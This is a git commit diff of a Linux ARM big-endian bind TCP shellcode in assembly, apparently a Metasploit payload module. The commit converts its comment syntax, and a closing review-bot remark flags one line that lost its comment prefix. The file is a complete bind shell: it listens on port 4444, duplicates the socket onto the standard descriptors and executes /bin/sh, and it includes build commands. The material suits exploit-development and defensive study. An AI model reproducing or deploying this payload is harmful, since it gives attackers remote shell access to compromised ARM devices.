armeb comments modified
parent
26680f58ca
commit
3147553d4f
|
@ -1,11 +1,30 @@
|
|||
/*
|
||||
Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
|
||||
Balazs Bucsay
|
||||
@xoreipeip | earthquake <at@> rycon <do.t> hu
|
||||
http://rycon.hu
|
||||
port = 4444
|
||||
ip = 0.0.0.0
|
||||
*/
|
||||
@@
|
||||
@
|
||||
@ Name: single_sock_bind
|
||||
@ Qualities: -
|
||||
@ Authors: Balazs Bucsay <@xoreipeip>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ Implementation of a Linux bind TCP shellcode for ARM BE architecture.
|
||||
@
|
||||
@ Assemble with:
|
||||
@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
|
||||
@ Link with:
|
||||
@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
|
||||
@
|
||||
@ Meta-Information:
|
||||
@
|
||||
@ meta-shortname=Linux Bind TCP
|
||||
@ meta-description=Listen on a port for a connection and run a second stage
|
||||
@ meta-authors=earthquake
|
||||
@ meta-os=linux
|
||||
@ meta-arch=armbe
|
||||
@ meta-category=singles
|
||||
@ meta-connection-type=bind
|
||||
@ meta-name=bind_tcp
|
||||
@@
|
||||
|
||||
|
||||
.section .text
|
||||
.global _start
|
||||
|
@ -13,12 +32,12 @@ ip = 0.0.0.0
|
|||
_start:
|
||||
.code 32
|
||||
|
||||
# Thumb-Mode on
|
||||
@ Thumb-Mode on
|
||||
add r6, pc, #1
|
||||
bx r6
|
||||
.code 16
|
||||
|
||||
# _socket(2,1,0)
|
||||
@ _socket(2,1,0)
|
||||
sub r2, r2, r2
|
||||
add r1, r2, #1
|
||||
add r0, r2, #2
|
||||
|
@ -27,16 +46,14 @@ ip = 0.0.0.0
|
|||
svc 1
|
||||
mov r6, r0
|
||||
|
||||
/*
|
||||
1 uint8_t sin_len
|
||||
1 sa_family_t sin_family
|
||||
2 in_port_t sin_port
|
||||
4 struct in_addr sin_addr
|
||||
8 char sin_zero [8]
|
||||
00 02 5C11 00000000 00000000 00000000
|
||||
5c11 => 4444
|
||||
*/
|
||||
# _bind()
|
||||
@ 1 uint8_t sin_len
|
||||
@ 1 sa_family_t sin_family
|
||||
@ 2 in_port_t sin_port
|
||||
@ 4 struct in_addr sin_addr
|
||||
@ 8 char sin_zero [8]
|
||||
@ 00 02 5C11 00000000 00000000 00000000
|
||||
@ 5c11 => 4444
|
||||
@ _bind()
|
||||
mov r2, #2
|
||||
lsl r2, r2, #8
|
||||
add r2, r2, #0x11
|
||||
|
@ -52,20 +69,20 @@ ip = 0.0.0.0
|
|||
add r7, r7, #1
|
||||
svc 1
|
||||
|
||||
# _listen()
|
||||
@ _listen()
|
||||
mov r0, r6
|
||||
sub r1, r1, r1
|
||||
add r7, r7, #2
|
||||
svc 1
|
||||
|
||||
# _accept()
|
||||
@ _accept()
|
||||
mov r0, r6
|
||||
sub r2, r2, r2
|
||||
add r7, r7, #1
|
||||
svc 1
|
||||
mov r6, r0
|
||||
|
||||
# _dup2()
|
||||
@ _dup2()
|
||||
sub r1, r1, r1
|
||||
mov r7, #63
|
||||
svc 1
|
||||
|
@ -78,23 +95,23 @@ ip = 0.0.0.0
|
|||
add r1, r1, #1
|
||||
svc 1
|
||||
|
||||
# _execve()
|
||||
_execve()
|
||||
sub r2, r2, r2
|
||||
mov r0, pc
|
||||
add r0, #18
|
||||
// next intstruction terminates the string beneath the code "//bin/sh"
|
||||
// in case you want to say goodbye to the null character
|
||||
// str r2, [r0, #8]
|
||||
@ next intstruction terminates the string beneath the code "//bin/sh"
|
||||
@ in case you want to say goodbye to the null character
|
||||
@ str r2, [r0, #8]
|
||||
str r2, [sp, #8]
|
||||
str r0, [sp, #4]
|
||||
add r1, sp, #4
|
||||
mov r7, #11
|
||||
svc 1
|
||||
|
||||
# _exit()
|
||||
@ _exit()
|
||||
sub r4, r4, r4
|
||||
mov r0, r4
|
||||
mov r7, #1
|
||||
svc 1
|
||||
.ascii "//bin/sh\0"
|
||||
//.ascii "//bin/sh"
|
||||
@.ascii "//bin/sh"
|
||||
|
|
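Review bot: The `_execve()` line that replaces `# _execve()` in the last hunk (just before `sub r2, r2, r2`) has lost its comment prefix, so it is no longer a comment: the assembler will try to parse `_execve()` as an instruction and the file will no longer build, unlike the sibling `@ _listen()`, `@ _accept()`, `@ _dup2()` and `@ _exit()` lines that this commit converts correctly. It should read `@ _execve()`. While in that block, the comment after `add r0, #18` carries a typo that could be fixed in the same pass: `@ next instruction terminates the string beneath the code "//bin/sh"`. The `_start` routine these lines belong to begins in an earlier hunk, so the surrounding control flow is not visible here.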